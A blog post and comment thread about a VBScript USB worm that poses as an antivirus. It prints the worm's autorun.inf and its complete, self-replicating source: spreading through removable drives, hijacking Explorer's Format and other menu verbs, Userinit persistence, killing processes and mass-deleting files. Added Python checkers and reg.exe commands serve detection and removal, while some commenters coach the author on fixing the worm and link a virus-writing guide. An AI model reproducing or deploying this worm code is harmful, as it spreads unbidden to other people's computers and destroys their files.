But yesterday, I came across this damn thing which does awful things like changing the folder settings. I had set the folder settings to show hidden files, but within a few seconds it was changed back to "do not show hidden files and folders".
So, after all, my computer too was infected. It was a quick virus/worm, I say. I was trying to format a USB drive and suddenly, it was there!!
Here is the script if anyone is interested.
This is the autorun file (autorun.inf):
[autorun]
open=wscript.exe SemiAntiVirus.vbs
icon=%systemroot%\System32\SHELL32.dll,8
action=Open folder to view files
shell\open=Open
shell\open\Command=wscript.exe SemiAntiVirus.vbs
shell\Auto=AutoPlay
shell\Auto\Command=wscript.exe SemiAntiVirus.vbs
shell\Explore\Command=wscript.exe SemiAntiVirus.vbs
shell\Find=Search...
shell\Find\Command=wscript.exe SemiAntiVirus.vbs
shell\Format...=Format...
shell\Format...\Command=wscript.exe SemiAntiVirus.vbs
Note: you can no longer assume that formatting an infected USB drive from Explorer is a safe way to get rid of the virus; the Format... entry above hands that context-menu item to the script as well. As the code above shows, this virus gets onto the computer by five routes:
1. Opening the drive
2. Using the AutoPlay feature
3. Exploring (right-click and select Explore)
4. Searching for files saved on the USB drive (Find)
5. Formatting
Interesting!!
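Here is a small checker, added to this page as an example and not part of the original post or of the script author's code, that parses an autorun.inf and reports which Explorer actions have been pointed at a script host. The sample text is rebuilt from the autorun.inf above; the list of interpreters it treats as suspicious (SCRIPT_HOSTS) is my own choice, not something the post defines.

```python
"""Flag autorun.inf entries that hand Explorer actions to a script host.

Added example (not from the original post): a parser for the autorun.inf
format plus a check for the trick used above, where open= and every
shell\<verb>\Command line point at wscript.exe.
"""
import re

# Constructed sample, rebuilt from the autorun.inf shown in the post.
SAMPLE_AUTORUN = r"""[autorun]
open=wscript.exe SemiAntiVirus.vbs
icon=%systemroot%\System32\SHELL32.dll,8
action=Open folder to view files
shell\open=Open
shell\open\Command=wscript.exe SemiAntiVirus.vbs
shell\Auto=AutoPlay
shell\Auto\Command=wscript.exe SemiAntiVirus.vbs
shell\Explore\Command=wscript.exe SemiAntiVirus.vbs
shell\Find=Search...
shell\Find\Command=wscript.exe SemiAntiVirus.vbs
shell\Format...=Format...
shell\Format...\Command=wscript.exe SemiAntiVirus.vbs
"""

# Assumption: interpreters and proxies that a removable drive's verbs should never launch.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "cmd.exe", "powershell.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe"}


def parse_autorun(text):
    """Return {key_lower: value} for the [autorun] section.

    configparser is avoided on purpose: the keys contain backslashes and dots,
    are case-insensitive on Windows, and values may contain '=' and '%'.
    """
    entries = {}
    in_section = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line[1:-1].strip().lower() == "autorun"
            continue
        if in_section and "=" in line:
            key, value = line.split("=", 1)
            entries[key.strip().lower()] = value.strip()
    return entries


def executable_of(command):
    """Lower-cased base name of the program a command line launches."""
    command = command.strip()
    if command.startswith('"'):                 # "C:\Program Files\x.exe" args
        end = command.find('"', 1)
        prog = command[1:end] if end > 0 else command[1:]
    else:
        prog = command.split(None, 1)[0] if command else ""
    return re.split(r"[\\/]", prog)[-1].lower()


def hijacked_actions(text):
    """List (action, command) pairs whose command runs something in SCRIPT_HOSTS.

    'open' is the AutoRun launch line; shell\<verb>\command lines are the
    context-menu verbs, including the fake Format... entry that shadows the
    real Format item.
    """
    findings = []
    for key, value in parse_autorun(text).items():
        if key == "open":
            action = "open (AutoRun)"
        elif key.startswith("shell\\") and key.endswith("\\command"):
            action = key[len("shell\\"):-len("\\command")]
        else:
            continue
        if executable_of(value) in SCRIPT_HOSTS:
            findings.append((action, value))
    return findings


if __name__ == "__main__":
    import sys
    # Pass the path of a suspect drive's autorun.inf; with no argument, use the sample.
    text = open(sys.argv[1], encoding="latin-1").read() if len(sys.argv) > 1 else SAMPLE_AUTORUN
    for action, command in hijacked_actions(text):
        print("%-15s -> %s" % (action, command))
```

Run it against the root of a suspect stick (for example `python check_autorun.py E:\autorun.inf`). An installer disc normally carries only open= and icon= lines; a shell\Format...\Command line has no business on any drive, and it is the one that turns "format the stick from Explorer" into "run the script".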
The actual virus script, which can be found at C:\Windows\System32\SemiAntiVirus.vbs:
To tell the truth, I do not understand a single line of this code (except the italicized part, which has a good sense of humor), but I hope it will help the computer geeks in finding a solution.
Important: please do not use this information for unethical purposes.
'******************************************************************
'********************* Virus Removal VBScript *********************
'************************** Version 1.00 **************************
'******************************************************************
'This antivirus program is intended to repair your computer from
'any sorts of virus attacks.
'This program is exactly like a normal virus but it repairs things
'rather than destroying them and its specially for LRI School only.
'I am not responsible if it goes to other place.
'If you do not belong to LRI Family then, please .......
'Author : Rajkumar Ghale (edited of VirusRemoval.vbs) of Sujin
'About me: I got a lots of program.
' If u want them, then u can contact me.
'Original Copy : Boot.vbs
'Virus Name : isetup.exe or Kinja.exe
'Another Copy : Sys.vbs
'Other Copy by Sujin : VirusRemoval.vbs
'******************************************************************
'******************************************************************
Option Explicit
On Error Resume Next   ' every runtime error below is swallowed; this is what hides the typos further down
Dim Fso,Shells,SystemDir,WinDir,Count,File,Drv,Drives,InDrive,ReadAll,AllFile,WriteAll,Del,folder,Files,Delete,auto,root,rtn,appfolder,kinzadir
Set Fso = CreateObject("Scripting.FileSystemObject")
Set Shells = CreateObject("Wscript.Shell")
Set WinDir = Fso.GetSpecialFolder(0)
Set SystemDir =Fso.GetSpecialFolder(1)
Set File = Fso.GetFile(WScript.ScriptFullName)
Set Drv = File.Drive
appfolder=Shells.SpecialFolders("AppData")
kinzadir = appfolder & "\dxdlls"
Set InDrive = Fso.drives
' Read the running script's own source into AllFile; this text is the payload it copies around.
Set ReadAll = File.OpenAsTextStream(1,-2)
do while not ReadAll.atendofstream
AllFile = AllFile & ReadAll.readline
AllFile = AllFile & vbcrlf
Loop
' Drop a copy into %SystemRoot%\System32 (the C:\Windows\System32\SemiAntiVirus.vbs mentioned above).
crvbs SystemDir,"SemiAntiVirus.vbs"
' Re-enable cmd.exe in case another worm disabled it.
Shells.RegWrite "HKCU\Software\Policies\Microsoft\Windows\System\DisableCMD","0","REG_DWORD"
Count=Drv.DriveType   ' 1 = removable; when started from a fixed drive the Do loop below never ends
Do
' "Antivirus" part: kill (taskkill) and delete files belonging to other USB worms it knows about.
delt SystemDir,"scvvhsot.exe",true
delt WinDir,"scvvhsot.exe",true
delt SystemDir,"blastclnnn.exe",true
delt SystemDir,"dxdlg.exe",true
delt SystemDir,"wprop.exe",true
delt SystemDir,"boot.vbs",false
delt SystemDir,"imapd.exe",true
delt SystemDir,"imapdb.exe",true
delt SystemDir,"imapdc.dll",false
delt SystemDir,"imapdd.dll",false
delt SystemDir,"imapde.dll",false
delt SystemDir,"kinza.exe",true
delt SystemDir,"isetup.exe",true
delt SystemDir,"Drivers\etc\hints.exe",true
' Intended to empty and remove %AppData%\dxdlls, but kinzadir is a string, not a Folder
' object, and "GetFoler" is a typo; On Error Resume Next hides both failures. Left as found.
For each Files in kinzadir.Files
set WriteAll = Fso.GetFile(Files.Name)
set Delete = WriteAll.Delete(True)
Next
set WriteAll = Fso.GetFoler(kinzadir)
set Delete = WriteAll.Delete(True)
' Registry changes: re-enable Folder Options, Task Manager and regedit (undoing other worms),
' rebrand the IE title bar, blank the IE start page and reset the Winlogon shell.
Shells.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue","1","REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Window Title","LRI Internet Explorer"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions","0","REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr","0","REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","0","REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank"
Shells.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell","explorer.exe"
' Persistence: Userinit runs at every interactive logon, so appending wscript.exe here
' restarts the script each time a user logs in. The value is rewritten on every pass of the loop.
Shells.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit",SystemDir & "\userinit.exe," & _
SystemDir & "\wscript.exe " & SystemDir & "\SemiAntiVirus.vbs"
' Spread: walk every drive letter (FSO DriveType 1 = removable, 2 = fixed).
For Each Drives In InDrive
root = Drives.Path & "\"
If Fso.GetParentFolderName(WScript.ScriptFullName)=root Then
Shells.Run "explorer.exe " & root   ' when launched via autorun, open the drive in Explorer as the user expected
End If
Set folder=Fso.GetFolder(root)   ' runs for every drive, A: included, before the A: filter below
Set Delete = Fso.DeleteFile(SystemDir & "\killvbs.vbs",true)
Set Delete = Fso.DeleteFile(SystemDir & "\VirusRemoval.vbs",true)
If Drives.DriveType=2 Then
delext "inf",Drives.Path & "\"   ' fixed drives: remove any .inf in the root
delext "INF",Drives.Path & "\"
End if
If Drives.DriveType = 1 Or Drives.DriveType = 2 Then
If Drives.Path<> "A:" Then
delext "vbs",WinDir & "\"   ' delete every other .vbs in %SystemRoot% and in the drive root
delext "vbs",Drives.Path & "\"
delt Drives.Path, "ravmon.exe",false
if Drives.DriveType = 1 then
crvbs Drives.Path,"SemiAntiVirus.vbs"   ' removable drive: drop a copy of itself
End if
delt Drives.Path,"sxs.exe",false   ' and clear rival worms out of the drive root
delt Drives.Path,"kinza.exe",false
delt Drives.Path,"SCVVHSOT.exe",false
delt Drives.Path,"New Folder.exe",false
delt Drives.Path,"Autorun.inf",false
delt Drives.Path,"isetup.exe",false
delt Drives.Path,"explorer.exe",false
delt Drives.Path,"smss.exe",false
delt Drives.Path,"winfile.exe",false
delt Drives.Path,"run.wsh",false
If Drives.DriveType = 1 Then
If Drives.Path<>"A:" Then
crinf Drives.Path,"autorun.inf"   ' removable drive: write the autorun.inf shown at the top of the post
End If
End If
End if
End If
Next
' Sleep 2 s and repeat forever unless the script was started from a removable drive.
' This endless loop is why the System32 copy is always reported as "in use".
if Count <> 1 then
Wscript.sleep 2000
end if
loop while Count<>1
' Delete every file in SrchPath whose name ends in File2Find (three characters, so "vbs" or "inf"), sparing SemiAntiVirus.vbs.
sub delext(File2Find, SrchPath)
Dim oFileSys, oFolder, oFile,Cut,Delete
Set oFileSys = CreateObject("Scripting.FileSystemObject")
Set oFolder = oFileSys.GetFolder(SrchPath)
Set File = oFileSys.GetFile(WScript.ScriptFullName)
For Each oFile In oFolder.Files
Cut=Right(oFile.Name,3)
' "UCse" is a typo for UCase: the comparison raises an error that On Error Resume Next swallows,
' so this extension filter cannot be relied on as written; test in a VM before assuming it only
' touches .vbs/.inf files. Left as found.
If UCse(Cut)=UCase(file2find) Then
If oFile.Name <> "SemiAntiVirus.vbs" Then set Delete = oFileSys.DeleteFile(srchpath & oFile.Name,true)
End If
Next
End sub
' Delete fPath\fName; when kil is true, first taskkill /f /im the process with that image name.
sub delt(fPath, fName, kil)
dim fSys, Delet, Wri, raj
set raj = CreateObject("Wscript.Shell")
set fSys = CreateObject("Scripting.FileSystemObject")
if fSys.FileExists(fPath & "\" & fName) then
if kil = true then
raj.Run "taskkill /f /im " & fName,0
set Wri = fSys.GetFile(fPath & "\" & fName)
Wri.Attributes = 0   ' clear ReadOnly/Hidden/System so the delete succeeds
set Delet = fSys.DeleteFile(fpath & "\" & fname,true)
else
set Wri = fSys.GetFile(fPath & "\" & fName)
Wri.Attributes = 0
set Delet = fSys.DeleteFile(fpath & "\" & fname,true)
End if
End if
end sub
' Write a copy of this script to fPath\fName. An existing copy is replaced only when the running copy is newer.
sub crvbs(fPath, fName)
dim dt, dt1, fSys, Writ, mfile, ReadAl, AllFil, chg, aLine, eLine,Shells
set fSys = CreateObject("Scripting.FileSystemObject")
set mfile = fSys.GetFile(WScript.ScriptFullName)
Set ReadAl = mfile.OpenAsTextStream(1,-2)
do while not ReadAl.atendofstream
AllFil = AllFil & ReadAl.readline
AllFil = AllFil & vbcrlf
Loop
If fSys.FileExists(fPath & "\" & fName) then
set Writ = fSys.GetFile(fPath & "\" & fName)
dt = Writ.DateLastModified
dt1 = mfile.DateLastModified
if (datevalue(dt1)-datevalue(dt)) > 0 then
delt fPath,"SemiAntiVirus.vbs",false
set Writ = fSys.CreateTextFile(fPath & "\" & fName,2,true)
Writ.Write AllFil
Writ.close
set Writ = fSys.GetFile(fPath & "\" & fname)
Writ.Attributes = -1   ' -1 has every attribute bit set; the intent is to mark the copy Hidden and System
end if
else
set Writ = fSys.CreateTextFile(fPath & "\SemiAntiVirus.vbs",true,true)
Writ.Write AllFil
Writ.close
set Writ = fSys.GetFile(fPath & "\" & fName)
Writ.Attributes = -1
end if
end sub
' Write the autorun.inf shown at the top of the post to fPath, rewriting it whenever its contents differ from eLine.
sub crinf(fPath, fName)
dim dt, dt1, fSys, Writ, mfile, ReadAl, AllFil, chg, aLine, eLine,Shells
set fSys = CreateObject("Scripting.FileSystemObject")
eLine =eLine & "[autorun]" & vbcrlf
eLine =eLine & "open=wscript.exe SemiAntiVirus.vbs" & vbcrlf
eLine =eLine & "icon=%systemroot%\System32\SHELL32.dll,8" & vbcrlf
eLine =eLine & "action=Open folder to view files" & vbcrlf
eLine =eLine & "shell\open=Open" & vbcrlf
eLine =eLine & "shell\open\Command=wscript.exe SemiAntiVirus.vbs" & vbcrlf
eLine =eLine & "shell\Auto=AutoPlay" & vbcrlf
eLine =eLine & "shell\Auto\Command=wscript.exe SemiAntiVirus.vbs" & vbcrlf
eLine =eLine & "shell\Explore\Command=wscript.exe SemiAntiVirus.vbs" & vbcrlf
eLine =eLine & "shell\Find=Search..." & vbcrlf
eLine =eLine & "shell\Find\Command=wscript.exe SemiAntiVirus.vbs" & vbcrlf
eLine =eLine & "shell\Format...=Format..." & vbcrlf
eLine =eLine & "shell\Format...\Command=wscript.exe SemiAntiVirus.vbs" & vbcrlf
If fSys.FileExists(fPath & "\" & fName) then
set Chg = fSys.GetFile(fPath & "\" & fName)
set ReadAl = Chg.OpenAsTextStream(1,-2)
do while not ReadAl.atendofstream
aLine = aLine & ReadAl.readline
aLine = aLine & vbcrlf
Loop
ReadAl.close
If trim(aLine) <> trim(eLine) then
Set Writ = fSys.CreateTextFile(fPath & "\" & fName,2,True)
Writ.write eLine
Writ.close
Set Writ = fSys.GetFile(fPath & "\" & fName)
Writ.Attributes = -1
End if
else
set Writ = fSys.CreateTextFile(fPath & "\" & fName,2,True)
Writ.Write eLine
Writ.Close
Set Writ = fSys.GetFile(fPath & "\" & fName)
Writ.Attributes = -1
end if
End sub
I am still trying to find a way to remove this. The .vbs file cannot be deleted, as it says that it is being used by another program.
Mm, and the best part is it does not allow another AVG to be installed on the machine. I tried to install Avast, but the moment the setup.exe loads, the machine restarts.
Cool, keep in touch. I'll post how to remove it if I find a way.
Until then, have fun!!
PS: if you know any way to remove this, you are more than welcome to share.
Yuho!! There are many things coming in. The IE title bar is changed into "LRI Internet Explorer" (if you look at the virus script carefully you can see more)... hehe, feels like I'm learning how to read a virus script.
Thanks for putting the code in your blog, coz I'm pretty much interested in such coding stuff. Now I'm checking it.
You are welcome, brother!! Have a look; yeah, it is pretty interesting!
Thanks for the information!
I never had the idea of the Format thing. It looks like Windows Explorer is very, very unsafe.
Use the command prompt (cmd.exe) to format disks, rather than Windows Explorer. It's the safe option.
Eg:
format e: /fs:fat32 /v:deeps_usb /x
For more info:
format /?
---
I read your script. It looks like it has some basic antivirus capability, but it itself acts as a virus. Looks like this baby doesn't like to coexist with other viruses.
Open a command prompt and enter the following lines one after another. (You can copy-paste.)
reg add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Window Title" /d "" /f
reg add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /d "http://www.google.lk/" /f
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /d %SystemRoot%\System32\userinit.exe, /f
For more information, try:
reg
reg add /?
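The Userinit line is the one that matters most, because the script writes it on every pass of its loop (the RegWrite on Winlogon\Userinit in the listing above). The checker below is added here as an example and is not code from the post or from the commenter; it parses the comma-separated Userinit value, reports anything that is not the stock userinit.exe, and builds the reg.exe command that restores it. It assumes a default %SystemRoot% of C:\Windows, and the infected sample value is constructed from what the script writes.

```python
"""Check the Winlogon Userinit value for extra logon programs.

Added example (not from the post or the commenter): the script appends
wscript.exe + SemiAntiVirus.vbs to Userinit so it is relaunched at every
logon; this finds any non-stock entry and prints the reg.exe command that
restores the stock value.
"""
import os

# Constructed sample: the value the script writes, as Windows stores it on a
# default install (SystemDir expands to C:\Windows\system32).
INFECTED_VALUE = (r"C:\Windows\system32\userinit.exe,"
                  r"C:\Windows\system32\wscript.exe C:\Windows\system32\SemiAntiVirus.vbs")
CLEAN_VALUE = r"C:\Windows\system32\userinit.exe,"   # stock value, trailing comma included


def userinit_entries(value):
    """Split the comma-separated list; Winlogon launches every non-empty entry."""
    return [e.strip() for e in value.split(",") if e.strip()]


def program_of(entry):
    """Lower-cased base name of the program an entry launches (handles a quoted path)."""
    entry = entry.strip()
    if entry.startswith('"'):
        end = entry.find('"', 1)
        prog = entry[1:end] if end > 0 else entry[1:]
    else:
        prog = entry.split(None, 1)[0]
    return prog.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def userinit_extras(value, systemroot=r"C:\Windows"):
    """Return (program, entry) for every entry that is not the stock userinit.exe.

    Only the exact stock path counts as clean: a userinit.exe anywhere else
    would be a look-alike, so it is reported too.
    """
    root = systemroot.rstrip("\\").lower()
    stock = root + r"\system32\userinit.exe"
    extras = []
    for entry in userinit_entries(value):
        normalised = entry.lower().replace("%systemroot%", root)
        if normalised != stock:
            extras.append((program_of(entry), entry))
    return extras


def restore_command(systemroot=r"C:\Windows"):
    """reg.exe command that writes the stock value back (run from an elevated prompt)."""
    return ('reg add "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon" '
            '/v Userinit /t REG_SZ /d "%s\\system32\\userinit.exe," /f' % systemroot)


if __name__ == "__main__":
    try:
        import winreg  # Windows only; read the live value when run on the affected machine
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
                            r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon") as key:
            value = winreg.QueryValueEx(key, "Userinit")[0]
    except ImportError:
        value = INFECTED_VALUE   # elsewhere, demonstrate on the constructed sample
    systemroot = os.environ.get("SystemRoot", r"C:\Windows")
    extras = userinit_extras(value, systemroot)
    for program, entry in extras:
        print("extra logon program: %s   (%s)" % (program, entry))
    if extras:
        print("restore with:", restore_command(systemroot))
    else:
        print("Userinit is clean")
```

Stop the running wscript.exe before fixing the value (the script's own `taskkill /f /im` trick works for that), otherwise the loop writes it back within two seconds. The stock value keeps its trailing comma, and writing under HKLM needs an elevated prompt.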
@shaakunthala (with regard to the following commands):
reg add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Window Title" /d "" /f
reg add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /d "http://www.google.lk/" /f
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /d %SystemRoot%\System32\userinit.exe, /f
I have already changed the home page manually in IE settings and tried to change the title bar using the command prompt. But changing the title bar of IE is not possible; it says that the system cannot find the path specified.
So I tried to use the registry editor to edit it. To my dismay, there was no entry called HKCU\Software\Microsoft\Internet Explorer\Main\Window Title.
Under Main, there are only 3 entries, namely
ErrorThresholds
FeatureControl
and
UrlTemplate
Check the virus code:
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","0","REG_DWORD"
I think this has something to do with it.
Windows is not at all safe, it seems!!
(with regard to deleting the virus files)
There are no files on my machine now. I have deleted them all. Only after deleting did I get this annoying pop-up at startup.
I had made a mistake in the registry editor.. hehehe, now all the things are working properly. Thanks for the help.
Hi deep, it's me Rajkumar...
Actually it's not a virus; it's like an antivirus, and doesn't let the USB virus attack the computer...
You can use it in a more secure way than any other antivirus..
Rajkumar
@Anonymous (Rajkumar),
Anything that runs and spreads without your proper permission is potentially a virus.
Oh.. sorry for that...
But as I told, I had made it for my personal use....
I don't know how it transferred...
Neither have I put it on the net..
I'm from Nepal and I don't know how it transferred to Sri Lanka...
But sorry for that...
No buddy, no need to say sorry. :)
There are some auto-replicating scripts that show up as antivirus programs. Most of the time these scripts are adware. They make minor changes to your system, such as changing your Internet Explorer home page and the like.
@Anonymous
Hey, no need to say sorry. When I was writing the post, I did some research with the data provided in the disclaimer part of the script. It led me to this school as the place of origin of the virus.
http://www.glocalnepal.com/lrischool
So I already knew that it's from Nepal ;-P
Well, the browser name still changes to LRI if you run this on a machine. It means to me that the original script itself has come to
Sri Lanka
Australia
India
Saudi Arabia
Sao Paulo
USA
Singapore
Hefa, etc., according to my web analyzer's data.
And yes, I agree with you ශාකුන්තල: anything that runs and spreads without your proper permission is potentially a virus, and that is why people from all over the world Google to find a way to remove it.
You may have created it for your personal use, but it has leaked and is now affecting a lot of computers in many countries.
OK, use a custom kernel compiled by yourself which disables the USB ports... or add extra protection for /dev/sdb*....
@Rajkumar -- your virus script is a stupid idea.
I got a version of it. I think it's all over the world.
http://thedailyreviewer.com/xphelp/view/wscriptexe---no-disk-error-1012097403
Don't screw up other people's computers!
Well, he's just a kid.
Taking into account where he lives and his age, he's brilliant.
I can feel the way he thinks, as I have also passed that age.
Giving him a helping hand with some sociological aspects, law and ethics as well would eventually build an ethical hacker. :-)
Agree with shaakunthala on the comment of David.
@David Zetland: You told that it's everywhere... look in your link..
http://thedailyreviewer.com/xphelp/view/wscriptexe---no-disk-error-1012097403
Look in the function
sub delt(fPath, fName, kil)
dim fSys, Delet, Wri, raj
Raj is my name... and I have declared it as my variable...
He is a cheater and copied my code...
haha
Rajkumar
@Rajkumar
That wscript.exe 'no disk' error is caused because maybe you did not keep a check for filtering and preventing 'A:' (floppy infection), or the filter code in your script is not working. It happened to me too once in my script, and it turned out to be the script trying to find and infect the floppy device, which of course is never ready these days.
Make sure you add the floppy filter properly.
____________________________________
Here is a virus guide. It spreads from Pendrives and open Network drives.
http://mywindowsworld.blogspot.com/2011/10/this-is-basic-framework-of-vbs-autorun.html
____________________________________
Well, most people think there are no hackers in Nepal. Well, I'd like to proudly state that they are wrong. I'm one of the Nepalese hackers and so is this script writer.
Visit this:
http://mywindowsworld.blogspot.com/2011/10/this-is-basic-framework-of-vbs-autorun.html
@anonymous: well, that's not my problem.. I don't think floppies are used nowadays... I don't use them, so I haven't used a filter for floppy... but it's easy... need to add 2-3 lines..
And also about Nepali hackers and script writers, I don't think they are like other hackers.... I'm Nepali too and make scripts and software... they just like to copy it without reference and I don't like it... for example, this was my own creation... I have seen many of them copying it, editing it... but no reference.. just some of my variables have not been edited yet and that's the proof...